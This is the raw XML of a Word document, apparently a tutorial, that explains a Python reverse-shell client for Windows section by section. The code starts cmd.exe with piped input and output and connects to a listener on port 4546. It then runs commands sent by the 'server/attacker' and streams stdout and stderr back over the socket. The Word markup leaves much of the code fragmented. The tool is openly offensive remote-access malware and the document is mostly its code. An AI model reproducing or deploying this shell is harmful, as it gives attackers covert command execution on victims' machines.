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919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argparse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A8ECB4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</w:p>
    <w:p w14:paraId="2318AF0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</w:p>
    <w:p w14:paraId="04FF18F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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496CFCB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</w:p>
    <w:p w14:paraId="7527DB8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</w:p>
    <w:p w14:paraId="151DF58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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396219E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from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win32com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shell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shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0387D00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0C43E5E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## 2. Outbound Data Transmission (Results Reporting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D8589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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCC5C9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#cmd.exe has now executed our command this client received from the server. Now we send the STDOUT result of that command after it ran via cmd.exe!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A149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Define a concurrency handler function dedicated to processing and sending standard shell output back to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C4634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def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shellstdout_</w:t>
      </w:r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sender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1621A21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23550E2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an infinite operational loop designed to continuously poll the running shell process for output data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110D8D7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4FF811A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7AC8FE5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Read available arbitrary data blocks from the standard output (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stdout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) stream of the shell process without blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD239E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.stdout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.read1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B052FB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3104213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try-except structure to gracefully handle runtime network drops or pipeline transit drops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067A715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225A682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015A625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Transmit the captured standard output byte sequence directly through the established socket connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037B194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.send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24851CF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21B6391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#basic exception handler to kill the process for cmd.exe if we cannot reach the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B7EDD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any network anomalies, exceptions, or connection drops happening during the send operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392D580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B977FD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1E10B09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Display a localized debugging notification stating that the server connection link has failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0152E43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"connection died..."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6409487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32E42E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30C9109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2C8DB8E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3FA9C0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lastRenderedPageBreak/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503FAD6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35EC167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D27C3F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39953BD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) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D26470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3080BFA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</w:t>
      </w:r>
      <w:proofErr w:type="gram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send</w:t>
      </w:r>
      <w:proofErr w:type="gram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errors (example: you typed 'net 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usr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' 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intead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of 'net user'. This will show you the error produced by cmd.exe    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56451BC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Define a concurrency handler function dedicated to processing and sending standard error output back to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3448287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def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shellstderr_</w:t>
      </w:r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sender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4F444DE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0A6D11A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an infinite operational loop designed to continuously poll the running shell process for error logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154BD84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9B467F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39046E1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Read available arbitrary data blocks from the standard error (stderr) stream of the shell process without blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FFD3D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.stderr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.read1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666E285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2B0E274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try-except structure to monitor network delivery operations and trap potential transit failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5904FBC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2F3BAAE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1F174C5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Transmit the captured error byte sequence directly through the established socket connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD752F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.send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6E9750A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DFF19D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#basic exception handler to kill the process for cmd.exe if we cannot reach the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E7BC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any network anomalies, exceptions, or connection drops happening during the send operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B308AF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50500CC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2A063EF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Display a localized debugging notification stating that the server connection link has failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA9CD4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"connection died..."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29346D2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B4BC3D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04A4C6B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4067B8B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662514D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379DABA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36CF62A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D07E4C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42E1614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5B5E456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4A993B0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7379BD9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## 3. Inbound Task Reception (Command Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206AA84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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C6EA5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#This function will take the command the server sent to this client, write it to the cmd.exe console, and execute it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0818BBB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#The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shellsender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) function will send the results of the executed command back to the server / attacker        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E6001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Define a concurrency handler function dedicated to receiving inbound command strings from the listening server infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F784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def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39D645E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6C43E63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an infinite loop to keep the inbound socket listening interface running continuously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E484A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70C1FA6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5CB0CF7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Implement a try-block to monitor network reception operations and trap potential channel failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0613ADA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3BF878B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463CCB8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Read an incoming data packet from the socket interface buffer up to a maximum size limit of 1024 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2559680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.recv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1024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71F8371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A66852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Evaluate if the received packet contains actual payload data by checking if its byte count is greater than zero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0F500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if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len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)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&gt;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287E307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</w:p>
    <w:p w14:paraId="0C159B0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</w:t>
      </w:r>
      <w:proofErr w:type="gram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if</w:t>
      </w:r>
      <w:proofErr w:type="gram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you </w:t>
      </w:r>
      <w:proofErr w:type="gram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type :leave</w:t>
      </w:r>
      <w:proofErr w:type="gram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: in the server/attacker console it closes the connection.  </w:t>
      </w:r>
      <w:proofErr w:type="gram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similar to</w:t>
      </w:r>
      <w:proofErr w:type="gram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'exit' but just a custom version of that that I like to implement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9EB1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Check if the decrypted plain-text string value contains the distinct termination token pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEC68A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if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gram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":leave</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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:"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in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.decode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"UTF-8"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1B77E1A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6119923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2D0B6F8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2AC220D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7473155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7E07D6F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0DCED2D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527C625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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    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08D59FB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) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065BF4F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10D23D6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Feed the received command string directly into the standard input (stdin) channel of the running shell process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8AEB7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.stdin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.write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28790E6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</w:p>
    <w:p w14:paraId="472A3FC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 clear and flush of the input stream buffer to ensure immediate command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADDEEF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.stdin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proofErr w:type="gramStart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flush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6F25579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</w:p>
    <w:p w14:paraId="069F12B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#basic exception handler to kill the process for cmd.exe if we cannot reach the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9E4A9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any network anomalies, exceptions, or connection drops happening during the receive operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A0D86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339AB4D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117A81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Display a localized debugging notification stating that the server connection link has failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139959D9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"connection died..."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7D18903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261FC5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7419F4B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22CDCDE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4C61AE7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5A6F4CB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7ADE225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6D8C0C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34690D6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3D330FB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AEEB24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## 1. Environment &amp; Process Initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623A1C9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A68B68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</w:t>
      </w:r>
      <w:proofErr w:type="gram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the command shell and pipe it's contents to stdin, stout, and stderr        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2F772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an interactive command-line session process while establishing explicit piping links for input, output, and error channels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFA83F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proofErr w:type="spell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"cmd.exe"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stdin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PIPE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stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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PIPE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stderr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PIPE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5EA52CB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01B132B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Assign the network target destination loopback string addressing configuration for local host testing routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F4305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host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"127.0.0.1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F0200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2E08840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lastRenderedPageBreak/>
        <w:t># Configure the specific TCP destination connection port identifier code for our outbound traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BD913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port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4546</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E78659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4BDE025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Initialize a streaming internet socket object leveraging standard IPv4 routing configurations and TCP mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0C64B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AF_INET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SOCK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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_STREAM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3980F1F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22D0362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try-block environment to attempt connection routines to the target listener without causing unhandled script crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BA355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0A9CDC7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3EC1975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Attempt to initialize a standard network connection sequence targeting the predefined host IP address and numeric port details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D8D37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connect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((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host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port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5034EEF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9C0742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connection rejections, timeout exceptions, or routing failures that happen during socket alignment tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0735417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211CE2F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6C3B35A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Print a distinct debugging notification detailing structural connection layer failures or missing server engines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36863C68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gram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"server/socket must have died...time to hop off"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56C83B9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5AA4146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Initiate a low-level process escape function to kill all running execution components instantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B0BFB6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0EB79DB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3529F482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#This initiates our function threads!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2595EB3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036D0AC7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 separate system thread worker mapped to continuously push standard command outputs via `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shellstdout_sender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`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0943227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target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shellstdout_sender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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8D6B6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F5ED951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Convert this specific worker thread into a background daemon so it terminates gracefully when the parent process stops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C3AC3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31B20E1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6D2B7C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Boot up the newly configured background daemon thread to start pushing data to the socket channel concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE24FED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0120F4C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85AC97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another operational execution thread worker dedicated to pushing standard shell errors via `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shellstderr_sender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`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF0826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target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shellstderr_sender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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC84F8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359F2C2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lastRenderedPageBreak/>
        <w:t># Convert this specific worker thread into a background daemon so it terminates gracefully when the parent process stops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366EC78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52E8CE8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4847ADAA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Boot up the newly configured background daemon thread to start pushing error data to the socket channel concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE3B7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689AE1A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8CF6C5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 third operational execution thread worker dedicated to listening for inbound server strings via `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687CB63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target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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1366A5E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3F6A36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Convert this specific worker thread into a background daemon so it terminates gracefully when the parent process stops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E740C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4DAD8330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48EA14E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Boot up the newly configured background daemon thread to start checking the socket channel for tasks concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECEF125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3B32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2406010B" w14:textId="77777777" w:rsidR="003B3212" w:rsidRPr="003B3212" w:rsidRDefault="003B3212" w:rsidP="003B321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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1562CC5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## 4. Connection Resilience &amp; Termination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A466BDF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA4EEF3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#continuous loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346FCF2C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permanent tracking block pointing out that the client loop requires an execution lock loop to preserve scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406B9E3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3B32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7BA20FB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1341572B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3B32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Introduce a 1-second process execution pause inside the master loop thread execution cycle to prevent extreme CPU exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB9B9F4" w14:textId="77777777" w:rsidR="003B3212" w:rsidRPr="003B3212" w:rsidRDefault="003B3212" w:rsidP="003B32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3B32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time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3B32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sleep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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3B32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</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32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05ED7962" w14:textId="77777777" w:rsidR="003B3212" w:rsidRDefault="003B3212"/>
    <w:sectPr w:rsidR="003B32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12"/>
    <w:rsid w:val="003B3212"/>
    <w:rsid w:val="005F733F"/>
    <w:rsid w:val="00A4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D6C2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1C8A7177-CDF8-4E9F-8EAD-3F6FF46F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B92FF22FAC44E950CF8BC9160185E" ma:contentTypeVersion="11" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="8e36f23ec5483a55d0ce9956695fd8c4">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="f5b99105-96d1-4cfa-8dd4-2cf3826ced41" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="399c60db948775380308ccf789f53370" ns3:_="">
    <xsd:import namespace="f5b99105-96d1-4cfa-8dd4-2cf3826ce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99105-96d1-4cfa-8dd4-2cf3826ce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99105-96d1-4cfa-8dd4-2cf3826ced41" xsi:nil="true"/>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{911607E2-EE51-46E2-B4F0-720588526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99105-96d1-4cfa-8dd4-2cf3826ce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F108D-8255-486E-9C26-CC9A299E4E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4D0D1-EA85-4E90-AB8C-5DAA2617FEA2}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="f5b99105-96d1-4cfa-8dd4-2cf3826ced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1584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2026-06-01T16:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-01T16:33:00Z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2026-06-01T16:31:17Z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df7c08dd-edbf-4b60-8f7b-711fa6479969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0x0101007E5B92FF22FAC44E950CF8BC9160185E</vt:lpwstr>
  </property>
</Properties>
</file>